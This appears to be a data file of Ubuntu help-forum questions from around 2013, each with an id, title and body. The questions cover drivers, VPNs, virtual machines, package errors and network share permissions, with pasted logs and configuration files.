295208	how do i connect to a vpn with ipsec ?	i created a config file for my fritzbox 7390 after this german tutorial now i want to configure my network-manager but there is no option for ipsec . do i need additional packages ? i tried to install l2tp ipsec vpn-applet , a gui for openswan but it doesent start , cause on xubuntu there is no unity icon possible . how can i install this on xubuntu ? update : i installed sudo apt-get install network-manager-vpnc and then i got the option to add a cisco-compatible vpn-client ( vpnc ) but i couldnt configure it , so it works . do i need something in the extended settings ? these are the configuration screens in german :
295209	need help regarding installation of ubuntu 13.04 on windows 7 pc	i used unetbootin software for usb booting . when i want to install ubuntu using usb i ca n't see the option called install ubuntu along the side windows . why is this happening ? when i tried this method in other pc it showed this alongside option but when i click this option the pc restarts and again the installation starts . what is the problem ? i checked the md5sum using the winmd5sum software and it was same .
295210	notification transparency	is there a way to customize the notifications ( notify-send ) that appear ? colour , transparency , font , font size , font colour , etc ? i would mainly like to increase transparency . ubuntu 13.04
295220	can not install netbeans 7.3	first and first , i had netbeans installed on my laptop when it was on 12.04 but after i upgraded it to 13.04 and could not find it on my dash so thought it was removed on upgrade . i tried to reinstall it using the .sh file from they 're official website and then i found out that it was already installed so i uninstalled it from my laptop and tried to again to install it ( so it would be a fresh install ) , but when the installer came out it told me that `` all components are installed '' . after that i tried cleaning my system with ubuntu tweak 's janitor and tried again but yet the problem persisted , and after this i manual deleted any directories/files related to netbeans ( searched the directories/files with nautilus ) and yet the problem is still there . when the installer start ( without errors ) , it simply says : '' all components are installed '' and the `` next '' button is deactivated . i installed netbeans 7.0.1 from software center but i would want to install the latest version . any clues/tips/help ?
295222	trouble with ubuntu installation in virtualbox	i 'm having some problems getting ubuntu to install . i 'm running windows xp home ( 32bit ) on an older dell dimension 2350 with 1gb ram , trying to install either ubuntu 12.04 lts ( 32bit ) or 13.04 ( 32bit ) inside virtualbox . both versions of ubuntu do n't make it past the purple screen with the loading dots . when i change over to the `` non-graphical '' version , with the scrolling text , it starts to list a series of tests that are either [ ok ] or [ fail ] . there are only a few that fail , and my search on those indicates that they 're not that important . there are a few settings for this vm that i 've tried tweaking based on other searches for an answer ( such as enabling io apic , switching the chipset to ich9 , changing the video memory size , enabling 3d acceleration , and enabling pae/nx . more or less , i get to the same point . ( once i got to the screen with desktop in the upper left corner , and the red-ish background . but an error came up that basically said there was an error , and that i could send off a report or hit cancel . i hit cancel , and instead of the installer coming up , nothing happened ) the last check that is run is `` stopping system v runlevel compatibility [ ok ] , and a bunch of starting [ ok ] s. then i get a black screen , then a half purple half black screen graphical error . sorta looks like snow , i do n't know how else to describe it . after a while . that goes away and is replaced by a black screen again . nothing else happens . i like to think i 'm fairly good at solving problems and following instructions , but i do n't even know how to go about diagnosing this . most of the solutions i 've seen seem to involve entering things into a command line , but does n't the os have to be installed to be able to do that ? this is a for fun/learning experience project , so it 's nothing too pertinent . but i would like to figure this out .
295229	how to remove xubuntu notification style ?	i downloaded xubuntu to try it on ubuntu . after uninstalling it using sudo apt-get purge xubuntu-desktop i found out that even after that when there were pop-up notifications , it would appear in xubuntu style . i want it to use the default style . how do i do that ?
295234	broken emacs installation	first of all , i am really sorry about behaving like an over smart . but hope you will be able to help me under the circumstance i am right now . i was having some difficulty with emacs in my ubuntu 12.04.2 installation . so i decided to reinstall everything from scratch . the steps i took are , sudo apt-get autoremove emacs24 cd /usr/share sudo rm -r emacs sudo rm -r emacs24 now whenever i try to install emacs , it tells me it ca n't find ispell , flyspell and debian-ispell and installation not completed , dpkg error . what can i do to fix it ? ( reading database ... 292802 files and directories currently installed . ) unpacking emacs ( from ... /emacs_24.1+1-2~ppa1~precise1_all.deb ) ... setting up emacs23 ( 23.3+1-1ubuntu9.1 ) ... emacs-install emacs23 edit : this is the output i get , if anyone is interested install/dictionaries-common : byte-compiling for emacsen flavour emacs23 > > error occurred processing debian-ispell.el : file error ( ( `` opening input file '' `` no such file or directory '' `` /usr/share/emacs23/site-lisp/dictionaries-common/debian-ispell.el '' ) ) > > error occurred processing ispell.el : file error ( ( `` opening input file '' `` no such file or directory '' `` /usr/share/emacs23/site-lisp/dictionaries-common/ispell.el '' ) ) > > error occurred processing flyspell.el : file error ( ( `` opening input file '' `` no such file or directory '' `` /usr/share/emacs23/site-lisp/dictionaries-common/flyspell.el '' ) ) emacs-install : /usr/lib/emacsen-common/packages/install/dictionaries-common emacs23 failed at /usr/lib/emacsen-common/emacs-install line 28 , < tsort > line 4. dpkg : error processing emacs23 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of emacs : emacs depends on emacs23 | emacs23-lucid | emacs23-nox ; however : package emacs23 is not configured yet . package emacs23-lucid which provides emacs23 is not installed . package emacs23-lucid is not installed . package emacs23-nox is not installed . dpkg : error processing emacs ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : emacs23 emacs e : sub-process /usr/bin/dpkg returned an error code ( 1 )
295241	how can i go back to 12.04 from 12.10 in a dual boot pc ?	i upgraded from 12.04 to 12.10 and i have a lot of issues i.e . mouse does n't respond . is there a way to go back to previous state with the 12.04 dvd or i have to erase everything and re-install ?
295243	get rid of visual bugs for intellij idea under unity	ubuntu 13.04 i686 , unity i just cant get rid of this buggy bottom bar , any ideas ?
295247	installing propriety nvidia drivers on ubuntu 13.04	i have a 2012 alienware x51 and i installed ubuntu 13.04 on it with the hdmi plugged into my nvidia 660 graphics card . it installed the nouveau drivers by default and i have no option in the `` additional drivers '' section to install nvidia driver so i installed it manually from the nvidia web site but steam complains that there is a opengl incompatibility . why is there no option to install nvidia drivers in the `` additional drivers '' section ? all i want to do is have nvidia drivers to test out steam on linux .
295248	how to set defaults of the new ubuntu version after an update ?	i have just update my ubuntu from 12.10 to 13.04 and i would like to know what defaults are currently used ? those of 12.10 or those of 13.04 ? after such an update , does ubuntu uses the new defaults or keep old ones ? for example , python is still python 2.7 and i though that default version in 13.04 was python 3 .
295249	is mono installed in 13.04 ?	i am learning to program in visual basic .net at school , and am using visual studio express . my teacher said that i can download mono to practise programming at home , and as my exam is soon , i want to start practising . i have read that it comes installed by default in some versions of ubuntu . i 'm currently using 13.04 . i do n't think it is installed already though . what do i need to do to get mono ? would a sudo apt-get install mono-runtime do the job ? is there anything else i would need to do ? thanks
295251	using my wifi netgear for syncing my file system	i have a desktop , a laptop and a tab . i have a wired internet connection which is routed through netgear for wifi connection to my laptop and android tablet . is it possible to sync my files of a particular location in my tablet/laptop with my desktop ? i do not want to use the google drive or dropbox as this will consume my network bandwidth ( over a long run ) . i want to use only my wifi netgear router ( intranet ) without using the internet .
295254	dell latitude e5420 freezes	i am experiencing problem with versions from 10 to 13 of ubuntu on dell latitude e5420 , specifically . the behavior is very weird . if ubuntu is started without power supply plugged in , the notebook works as a charm . at the moment the charger is plugged in , the notebook starts working slowly , the mouse pointer is moving like an ant . unplugging the charger turns ubuntu back to its normal condition . plugging it in , back , repeats the issue . if ubuntu starts with power supply plugged in and 100 % charged battery it is ok , however if not with fully charged battery and on power supply , the issue occurs again . so far , i believe this happens only on that model of dell . on latitude e5410 i did not manage reproducing it . has anyone of you had such a case ?
295263	ubuntu server 13.04 virtual kernel inside virtualbox has just 16 colors	i installed ubuntu 13.04 server with virtual-kernel option inside of virtualbox to try it out . it does seem to be working faster then the regular image . but there is one problem . the terminal has just 16 colors and i really like solarized theme in vim . not to mention fish shell that also supports 256 colors . i played with settings inside of grub.cfg , and i noticed that not all resolution work and no matter which color pallet i chose in there , there are always just 16 color . which i tested by running colortest-256 utility found in the repo . is this a limitation of virtual-kernel image i chose when installing ? can i overcome it somehow ? maybe by installing some packages ?
295268	webcam appears black in skype , acer aspire v3-571g	my webcam functions normally on flash , cheese , etc . however in skype , it appears black . my laptop is acer aspire v3-571g . anyone know how to fix it ?
295269	how to open a crontab file in c++	i am working on a qt application which makes the usage of crontab easier with gui . but i am facing the trouble of including the jobs in the crontab file from my application . so how do i open a crontab file in c++ application in order to edit it . any kind of help is appreciated . thank you
295270	failing to initialize nvidia gpu	i have installed nvidia-current on 12.04 and bumblebee according to these links http : //news.softpedia.com/news/how-to-install-the-latest-nvidia-driver-on-ubuntu-12-04-295542.shtml and https : //wiki.ubuntu.com/bumblebee respectively . however when attempting to run optirun i get the following error : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed t0 initialize the nvidia gpu at pci:1:0:0 . please [ error ] aborting because fallback start is disabled . i have google this extensively , without being able to find a general consensus on what to do . i have intel core i5 , and geforce 740m nvidia card . i have provided some system info below : **root @ : /home/ # lspci -d 10de : -vvnn** 01:00.0 3d controller [ 0302 ] : nvidia corporation device [ 10de:0fdf ] ( rev a1 ) subsystem : asustek computer inc. device [ 1043:1587 ] control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 16 region 0 : memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] region 1 : memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] region 3 : memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] region 5 : i/o ports at e000 [ size=128 ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ 78 ] express ( v2 ) endpoint , msi 00 devcap : maxpayload 256 bytes , phantfunc 0 , latency l0s unlimited , l1 < 64us exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag+ phantfunc- auxpwr- nosnoop+ maxpayload 256 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed unknown , width x16 , aspm l0s l1 , latency l0 < 512ns , l1 < 4us clockpm+ surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x16 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : range ab , timeoutdis+ devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : unknown , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -3.5db capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 128 v1 ] power budgeting < ? > capabilities : [ 600 v1 ] vendor specific information : id=0001 rev=1 len=024 < ? > capabilities : [ 900 v1 ] # 19 kernel driver in use : nvidia kernel modules : nvidia_current , nouveau , nvidiafb root @ : /home/ # dmesg | grep bb [ 0.000000 ] percpu : embedded 14 pages/cpu @ f7bb2000 s34176 r0 d23168 u57344 [ 15.081790 ] bbswitch : version 0.6 [ 15.081796 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 15.081801 ] bbswitch : found discrete vga device 0000:01:00.0 : \_sb_.pci0.peg0.pegp [ 15.081882 ] bbswitch : detected an optimus _dsm function [ 15.081887 ] bbswitch : succesfully loaded . discrete card 0000:01:00.0 is on [ 15.083422 ] bbswitch : disabling discrete graphics root @ dominic : /home/ # dmesg | grep nv [ 2.088239 ] rtc0 : alarms up to one month , y3k , 242 bytes nvram , hpet irqs [ 14.245426 ] acpi error : current brightness invalid ( 20120320/video-384 ) [ 261.089873 ] nvidia : module license 'nvidia ' taints kernel . [ 261.488938 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 261.488959 ] nvidia 0000:01:00.0 : power state changed by acpi to d0 [ 261.488970 ] nvidia 0000:01:00.0 : enabling device ( 0006 - > 0007 ) may 14 12:48:31 kernel : [ 186.764848 ] nvrm : loading nvidia unix x86 kernel module 304.88 wed mar 27 14:31:12 pdt 2013 may 14 12:51:12 kernel : [ 348.405000 ] nvrm : rminitadapter failed ! ( 0x26:0xffffffff:1200 ) may 14 12:51:12 kernel : [ 348.405018 ] nvrm : rm_init_adapter ( 0 ) failed may 14 12:55:57 kernel : [ 261.489352 ] nvrm : loading nvidia unix x86 root @ : /home/ # uname -a linux 3.5.0-28-generic # 48~precise1-ubuntu smp wed apr 24 21:43:05 utc 2013 i686 i686 i386 gnu/linux cat /etc/issue ubuntu 12.04.2 lts \n \l root @ : /home/ # dpkg -l|grep nvidia ii nvidia-common 1:0.2.44.2 find obsolete nvidia drivers ii nvidia-current 304.88-0ubuntu0.0.2 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings 304.88-0ubuntu0.0.2 tool of configuring the nvidia graphics driver /home # cat /etc/bumblebee/bumblebee.conf \ # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia_current pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau /home # cat /etc/bumblebee/xorg.conf.nvidia section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . # busid `` pci:01:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection
295272	12.04 kde stackexchange stackapp / widget	iam on the move to find a stackexchange app for my desktop ( kde 12.04 ) i would like to keep track of my favorite stackexchange sites /stackexchange accounts . sadly google did not deliver any interesting result for my purpose . i have read about askubuntu lens a while back but what i look for supports `` my favorite stackxchange sites '' not solely askubuntu . you can help by suggesting nice applications or website sources where i can read/find an application for my purpose . i have browsed on http : //stackapps.com/ , but there is no directory structure which makes it time consuming .
295283	free dns service	edit : the answer selected was for something entirely different that what what i originally asked . i tried to ask here but i suppose i was n't clear enough . i have a vps running ubuntu 12.04 . i have a domain , registered with a company that does not provide dns . i need a nameserver so that my domain works . with the registrar i have inputed ns1.mydomain.com and ns2.mydomain.com . i want to run my own nameserver . both ns1 and ns2 should point to the same computer despite the fact that this defeats the purpose of redundancy . with no success , i have tried several guides , including ones from the ubuntu documentation . i have probably messed up the configuration pretty good by now . does anyone have a guide that they know works ? how will i know it is working ? some guides prescribed reverse dns , some did not , is it needed ? what should i look for in a good guide ?
295285	wireless only working near the router	i am experiencing some very slow internet unless i am close to the router . since my phone and my other computer work just fine at the same distance , it must be some problem with hardware or drivers . can anyone list the possible causes for this issue , so i could check one by one ? here goes some details about my configurations : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' naboo '' mode : managed frequency:2.422 ghz access point : 1c : af : f7:5b:5c:8c bit rate=57.8 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=37/70 signal level=-73 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:2039 invalid misc:472 missed beacon:0 and also $ lspci -nnk | grep -ia2 net 01:00.0 network controller [ 0280 ] : intel corporation centrino advanced-n 6235 [ 8086:088e ] ( rev 24 ) subsystem : intel corporation centrino advanced-n 6235 agn [ 8086:4060 ] kernel driver in use : iwlwifi -- 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : samsung electronics co ltd device [ 144d : c0d7 ] kernel driver in use : r8169 thanks in advance for any tip .
295286	error message while updating r version from 2.10 to 3.0 on ubuntu 12.04	i get the following error message while trying to update my current r version from 2.10 to 3.0.any tips would be welcome . thanks mgjohnson @ mgjohnson-linux : ~ $ apt-get install r-base e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? mgjohnson @ mgjohnson-linux : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied )
295293	/usr/bin/env : bash : permission denied	suddenly , when your seniors linux server admin does not come at office . and then junior linux admin take a charge of it , then it is nightmare for them . please help . i 'm not able to recollect , that what i did in .bashrc file in the server , after re-logging in the server . not a single was not working . commands like ls , cat , and vi was not working on the server . i was getting error : `` command not found '' . i have manage to fix from below steps : edited .bashrc file in home pasted below text in the file path= $ path : /home/amol/bin : /usr/local/bin : /usr/bin : /bin : /usr/local/games : /usr/games export path after reloading .bashrc from command -- > source ~/.bashrc . comands started working . but whenever i loggin in the server . i get below error : last login : tue may 14 10:33:46 2013 from 14.140.90.22 /usr/bin/env : bash : permission denied /usr/bin/env : bash : permission denied /usr/bin/env : bash : permission denied /usr/bin/env : bash : permission denied /usr/bin/env : bash : permission denied -bash : tar : command not found -bash : grep : command not found -bash : cat : command not found i have searched in google , but not getting exact solution . os : ubuntu 10.04 . below is .bashrc file : http : //paste.ubuntu.com/5664287/ please help .
295295	missing operating system after removing windows though partition ( gparted )	my laptop is divided into three drives : c , d and e. windows was installed in c and ubuntu was in d. i format c and e by deleting and to ntfs using gparted . but when i restart , it tells me a `` missing operating system '' . how can i tell the bios to boot from d ? or is there anything i can do ? i installed several big software in the ubuntu system , so i do n't want to reboot from a usb and to lose the saved data . thanks ! thanks for all your answers . my question is solved . i just reboot from a usb and re-install the system and software .
295297	nagstamon does n't show in ubuntu 12.04 ?	i 'm trying to do the nagstamon work on ubuntu 12.04 , but after setting my credentials only , the other setting i kept default , it does n't show anywhere . i 'm sure it 's running 'cause of ps aux | grep nagstamon show me that is running and the sounds that it makes when some status change . any idea how to fix this ?
295302	permissions of mounted cifs share ( shared from freenas )	i have a freenas installation running under virtualbox . when i try to mount one of my freenas shares in ubuntu 12.10 , permissions on the share prevent me from entering the directory , listing or creating files . my intention was to provide a share where the freenas john account has full authority , and the barbara and mark accounts have read-only access . however the permissions of the mounted share pevent me from even listing the directory , let alone create or read any files there . am i doing something wrong when mounting the share ? i will try to provide more information below . i set up my freenas according to the instructions found here . the resulting storage has permisssions as shown here : ( i know i need to tweak the write-permissions for the group . ) under windows7 , i have no problems mounting the share : c : \users\john > ipconfig /all windows ip configuration host name . . . . . . . . . . . . : orion primary dns suffix . . . . . . . : node type . . . . . . . . . . . . : hybrid ip routing enabled . . . . . . . . : no wins proxy enabled . . . . . . . . : no dns suffix search list . . . . . . : dibnatri.net wireless lan adapter wireless network connection : connection-specific dns suffix . : dibnatri.net description . . . . . . . . . . . : intel ( r ) centrino ( r ) wireless-n 1030 physical address . . . . . . . . . : [ redacted ] dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes ipv4 address . . . . . . . . . . . : 192.168.1.100 ( preferred ) subnet mask . . . . . . . . . . . : 255.255.255.0 lease obtained . . . . . . . . . . : tuesday , may 14 , 2013 6:47:24 am lease expires . . . . . . . . . . : friday , june 20 , 2149 1:24:02 pm default gateway . . . . . . . . . : 192.168.1.1 dhcp server . . . . . . . . . . . : 192.168.1.1 dns servers . . . . . . . . . . . : 192.168.1.1 netbios over tcpip . . . . . . . . : enabled ethernet adapter local area connection : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : dibnatri.net description . . . . . . . . . . . : realtek pcie fe family controller physical address . . . . . . . . . : [ redacted ] dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes [ snip ] c : \users\john > net use new connections will be remembered . there are no entries in the list . c : \users\john > net use y : /user : john \\192.168.1.20\tunes the password is invalid for \\192.168.1.20\tunes . enter the password for 'john ' to connect to '192.168.1.20 ' : the command completed successfully . y : \ > net use new connections will be remembered . status local remote network -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ok y : \\192.168.1.20\tunes microsoft windows network the command completed successfully . c : \users\john > y : y : \ > dir volume in drive y is tunes volume serial number is 1d20-98ec directory of y : \ 05/14/2013 06:54 am < dir > . 05/13/2013 02:58 pm < dir > .. 0 file ( s ) 0 bytes 2 dir ( s ) 6,131,715,282,944 bytes free y : \ > copy con test1 sss ^z 1 file ( s ) copied . y : \ > dir volume in drive y is tunes volume serial number is 1d20-98ec directory of y : \ 05/14/2013 06:56 am < dir > . 05/13/2013 02:58 pm < dir > .. 05/14/2013 06:56 am 5 test1 1 file ( s ) 5 bytes 2 dir ( s ) 6,131,715,447,808 bytes free y : \ > type test1 sss however , attempting to do the same under ubuntu does n't work as well : [ johnd : ~ ] $ ifconfig eth0 link encap : ethernet hwaddr [ redacted ] up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:215 errors:0 dropped:0 overruns:0 frame:0 tx packets:215 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20073 ( 20.0 kb ) tx bytes:20073 ( 20.0 kb ) wlan0 link encap : ethernet hwaddr [ redacted ] inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :4e80:93ff : fe0c : f3a0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2287 errors:0 dropped:0 overruns:0 frame:0 tx packets:1980 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1669164 ( 1.6 mb ) tx bytes:761260 ( 761.2 kb ) [ johnd : ~ ] $ sudo mount -l [ sudo ] password for johnd : /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) /dev/sda6 on /home type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/johnd/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=johnd ) [ johnd : ~ ] $ ls /mnt/ [ johnd : ~ ] $ sudo mkdir /mnt/tunes [ johnd : ~ ] $ ls -l /mnt/ total 4 drwxr-xr-x 2 root root 4096 may 14 07:04 tunes [ johnd : ~ ] $ ls -l /mnt/ total 4 drwxr-xr-x 2 root root 4096 may 14 07:04 tunes note the permissions & owner of /mnt/tunes above . it is about to change , though i do n't know if that 's expected/correct . [ johnd : ~ ] $ sudo mount -t cifs //192.168.1.20/tunes /mnt/tunes -o rw , user=john password : [ johnd : ~ ] $ ls -l /mnt/ total 0 drwxrwx -- - 2 1001 1003 0 may 14 06:56 tunes 1001 is the uid for john on my freenas , and 1003 is the gid for users there . john should have full access . [ johnd : ~ ] 1 $ ll /mnt/tunes ls : can not open directory /mnt/tunes : permission denied [ johnd : ~ ] 1 $ cat > /mnt/tunes/test2 bash : /mnt/tunes/test2 : permission denied [ johnd : ~ ] 2 $ what am i doing wrong here ?
295303	did unetbootin actually install ubuntu in windows 7 ?	i was using unetbootin on my laptop to retreive ubuntu 12.04 lts and create a live cd . i wanted to use ubuntu to remove a virus that i have in windows xp on my home pc . now when i boot my laptop , i am asked to select either windows 7 or unetbootin . if i select unetbootin , it appears that ubuntu is installed on my pc because i do n't have the cd/dvd loaded but ubuntu runs . in add/remove programs , only unetbootin appears , no ubuntu . can someone offer some advice ? i thought i was saving the ubuntu iso to my laptop hard drive so i could later create the ubuntu live cd to use in my home pc .
295306	environmental variable for current domain	i 'm using ubuntu 12.04 lts desktop edition i want to use environmental variable for currently joined domain just like i use $ user to bring current user . from what i read there are few variables for that , but none seems to work for me . i also can not see those variables as active when i type env command . i would appreciate a solution on how to enable that variable or how to make my own variable by pulling current domain name from the system somehow .
295310	the search in ubuntu software center disappears	the image is here : i 'm using ubuntu 13.04 64-bit in vmware 9 . the menu edit > search does n't work . i tried to run in terminal `` software-center '' , but only get a lot of failure message . i did n't resize the window . please help . thank you .
295311	optimal fix for post login freeze in kubuntu due to pulseaudio	the following programs which starts with kubuntu 13.04 freeze my kde desktop for about 10 seconds . start-pulseaudio-kde start-pulseaudio-x11 when i remove the startup entries from /etc/xdg/autostart , the login proceeds normally . sounds work fine . i want to know , is it safe to removing those startup entries ? is it compulsory to launch above programs ? please mention , if there is an alternative fix . i suspect this happened after installing fglrx video driver . thanks !
295313	ubuntu software center in ubuntu 13.04 crashes when opened	i am using ubuntu 13.04 with gnome 3.8.1.when i try to open ubuntu software center , it simply crashes . somebody please help me out . thank you .
295320	how to replace plymouth with xsplash ?	i 'm using ubuntu 13.04 with mate desktop , and i would like to replace plymouth with good old xsplash . but i have no idea how to do that ...
295322	beginner question : put script in start up ?	i 'd like to put this basic script : # ! /bin/bash xsetwacom set `` wacom bamboo 16fg 4x5 finger touch '' touch off xsetwacom set `` wacom bamboo 16fg 4x5 pen eraser '' touch off xsetwacom set `` wacom bamboo 16fg 4x5 finger pad '' touch off in the start-up applications . i 'm a beginner , so i 'm not sure what to do now - currently i just double-click on the script via pcmanfm and hit `` execute '' .
295323	ubuntu virtual display help ?	when the computer says that the virtual machine windows is optimised to work in 32 bit color mode but the virtual display is currently set to 16 bit . what does it mean and what should i do ? im using a 64 bit computer , but installed virtual box via . virtualbox 4.2.12 for windows hosts x86/amd64 . i only had a virtual machine , which is using latest features , ubuntu 13.04 , 64 bit .
295329	the system does not go down	/etc/init.d/.depend.stop my ubuntu 12.04 the system shuts down normally not get error message ca n't not open / etc / init.d / .depend.stop no such file of directory see picture what can i do ?
